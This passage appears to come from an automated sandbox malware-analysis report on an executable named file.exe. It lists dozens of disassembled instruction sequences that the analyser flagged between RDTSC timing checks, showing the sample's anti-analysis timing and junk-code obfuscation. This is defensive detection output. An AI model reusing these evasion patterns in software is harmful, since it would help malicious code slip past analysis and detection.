jmp 00007FD2D0DFA0D0h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EEEF second address: D2EEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EEF5 second address: D2EEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EEF9 second address: D2EF99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D34CFh] 0x00000012 push 00000000h 0x00000014 mov dx, cx 0x00000017 push A9C2359Bh 0x0000001c push edx 0x0000001d push esi 0x0000001e jnp 00007FD2D0B60AE6h 0x00000024 pop esi 0x00000025 pop edx 0x00000026 add dword ptr [esp], 563DCAE5h 0x0000002d mov edx, dword ptr [ebp+122D3483h] 0x00000033 push 00000003h 0x00000035 jg 00007FD2D0B60AECh 0x0000003b push 00000000h 0x0000003d jng 00007FD2D0B60AE9h 0x00000043 movsx edx, cx 0x00000046 push 00000003h 0x00000048 mov edi, edx 0x0000004a call 00007FD2D0B60AE9h 0x0000004f jnp 00007FD2D0B60AFEh 0x00000055 push eax 0x00000056 jc 00007FD2D0B60AEAh 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 pushad 0x00000061 jmp 00007FD2D0B60AEAh 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EF99 second address: D2EF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EF9D second address: D2EFCD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FD2D0B60AF4h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jmp 00007FD2D0B60AEBh 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EFCD second address: D2EFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pop eax 0x00000007 sub dword ptr [ebp+122D2CC4h], ecx 0x0000000d lea ebx, dword ptr [ebp+12450A90h] 0x00000013 mov dword ptr [ebp+122D2E0Eh], eax 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FD2D0DFA0C8h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FFDB second address: D4FFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FD2D0B60AECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FFE8 second address: D4FFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E1C0 second address: D4E1CA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2D0B60AE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E1CA second address: D4E1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD2D0DFA0C8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E490 second address: D4E4A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD2D0B60AF2h 0x0000000c jns 00007FD2D0B60AE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EB07 second address: D4EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD2D0DFA0CFh 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC59 second address: D4EC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0B60AF8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC75 second address: D4EC7F instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0DFA0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EDB1 second address: D4EDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EDB5 second address: D4EDB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EDB9 second address: D4EDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EEF6 second address: D4EF28 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD2D0DFA0C6h 0x00000008 jmp 00007FD2D0DFA0D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FD2D0DFA0D2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F846 second address: D4F84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F84A second address: D4F850 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D514BE second address: D514DD instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD2D0B60AF2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D514DD second address: D514F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD2D0DFA0C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2D0DFA0CDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5532F second address: D55333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55333 second address: D55340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55340 second address: D55345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5549F second address: D554F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2D0DFA0D0h 0x00000008 jnl 00007FD2D0DFA0C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FD2D0DFA0D4h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push edx 0x0000001d jmp 00007FD2D0DFA0CEh 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007FD2D0DFA0C6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D554F3 second address: D554F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D554F9 second address: D55510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0DFA0D3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D544BA second address: D544BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B13C second address: D5B170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FD2D0DFA0D4h 0x0000000e pop edi 0x0000000f jmp 00007FD2D0DFA0D0h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AA0E second address: D5AA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AD55 second address: D5AD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AEA6 second address: D5AEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AEAA second address: D5AEB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AEB0 second address: D5AEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD2D0B60AEEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E744 second address: D5E778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D3h 0x00000007 jng 00007FD2D0DFA0C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007FD2D0DFA0D7h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B6A second address: D19B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B6E second address: D19B7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FD2D0DFA0C8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B7C second address: D19B85 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19B85 second address: D19BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD2D0DFA0C6h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edi 0x00000013 jmp 00007FD2D0DFA0CAh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19BA2 second address: D19BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE0B second address: D5EE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE0F second address: D5EE26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FD2D0B60AE6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE7C second address: D5EE82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE82 second address: D5EE88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EE88 second address: D5EEC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FD2D0DFA0D8h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b pushad 0x0000001c jne 00007FD2D0DFA0C6h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EEC3 second address: D5EEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 jnp 00007FD2D0B60AF7h 0x0000000f jmp 00007FD2D0B60AF1h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007FD2D0B60AE6h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EEF1 second address: D5EEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EEF5 second address: D5EF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FD2D0B60AE6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F4CC second address: D5F4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F4D2 second address: D5F4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FBBB second address: D5FBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0CCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FBCC second address: D5FBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0B60AF9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FC92 second address: D5FCF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FD2D0DFA0C8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov esi, 3EEE763Eh 0x00000027 nop 0x00000028 push ebx 0x00000029 jmp 00007FD2D0DFA0D2h 0x0000002e pop ebx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jno 00007FD2D0DFA0DFh 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FDBE second address: D5FDC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6074C second address: D6076C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD2D0DFA0D2h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60F83 second address: D60F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60F87 second address: D60F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D621EA second address: D621F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60F8D second address: D60F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D621F7 second address: D621FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60F93 second address: D60F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D635DA second address: D63672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0B60AF4h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FD2D0B60AEAh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FD2D0B60AE8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c cmc 0x0000002d mov edi, 14EE3DB3h 0x00000032 push 00000000h 0x00000034 add edi, 5E165371h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FD2D0B60AE8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jnp 00007FD2D0B60AECh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FD2D0B60AF5h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63F81 second address: D63FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FD2D0DFA0C6h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FD2D0DFA0C8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FD2D0DFA0C8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push 00000000h 0x00000049 jmp 00007FD2D0DFA0D2h 0x0000004e xchg eax, ebx 0x0000004f push ebx 0x00000050 pushad 0x00000051 push edx 0x00000052 pop edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63D3E second address: D63D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63FF0 second address: D63FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63D44 second address: D63D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FD2D0B60AE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64890 second address: D64894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64894 second address: D6489A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6534C second address: D65364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D655C7 second address: D655D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D655D2 second address: D655FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007FD2D0DFA0E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD2D0DFA0D8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D655FA second address: D65662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 call 00007FD2D0B60AF4h 0x0000000c mov edi, ecx 0x0000000e pop esi 0x0000000f or di, B3DDh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FD2D0B60AE8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov esi, dword ptr [ebp+122D2A84h] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a jg 00007FD2D0B60AECh 0x00000040 pop ebx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jno 00007FD2D0B60AECh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65662 second address: D65668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D671F4 second address: D671F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65E3A second address: D65E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65E40 second address: D65E45 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D684B7 second address: D684BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D689F3 second address: D68A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jo 00007FD2D0B60AF6h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FD2D0B60AE8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1CA1h], eax 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FD2D0B60AE8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D3653h] 0x00000054 jbe 00007FD2D0B60AE8h 0x0000005a mov ebx, eax 0x0000005c push 00000000h 0x0000005e xchg eax, esi 0x0000005f pushad 0x00000060 push esi 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 pop esi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FD2D0B60AF7h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68A91 second address: D68A9E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68A9E second address: D68AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
